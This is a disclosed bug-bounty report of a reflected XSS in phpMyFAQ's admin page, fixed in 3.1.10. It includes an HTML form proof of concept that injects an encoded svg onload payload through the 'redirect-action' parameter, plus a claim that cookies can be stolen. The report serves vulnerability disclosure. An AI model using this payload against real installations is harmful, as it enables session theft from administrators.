Reflect XSS Which can help in any CSRF Vulnerability in thorsten/phpmyfaq

Valid

Reported on

Dec 13th 2022


Description

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites.

Proof of Concept

Below HTML code for trigger XSS with POST method

<html>
 <title>XSS POC By AggressiveUser</title>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://roy.demo.phpmyfaq.de/admin/index.php" method="POST">
      <input type="hidden" name="redirect&#45;action" value="AggressiveUser&quot;&gt;&lt;svg&#32;onload&#61;alert&#40;112233&#41;&gt;" />
      <center><input type="submit" value="Click Here for Trigger XSS" />
    </form>
  </body>
</html>

Below BurpSuite POC POST Method XSS

#YO Maintainer :) Long Time No SEE !

Impact

Attacker can execute javascript, Anyone can steal the cookie, redirect to any URL and other lots of FUN.

We are processing your report and will contact the thorsten/phpmyfaq team within 24 hours. 5 months ago
thorsten/phpmyfaq maintainer has acknowledged this report 5 months ago
Thorsten Rinne gave praise 5 months ago
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
Thorsten Rinne validated this vulnerability 5 months ago
AggressiveUser has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Thorsten Rinne marked this as fixed in 3.1.10 with commit 3872e7 5 months ago
Thorsten Rinne has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Jan 31st 2023
AggressiveUser
4 months ago

Researcher


Hi @admin As i can see their one message is "This vulnerability has been assigned a CVE"

But i can't find any CVE attached with this report

Pavlos
4 months ago

Admin


On Jan 31st you will see it :)

AggressiveUser
4 months ago

Researcher


ok thanks @admin <3

Thorsten Rinne published this vulnerability 4 months ago
to join this conversation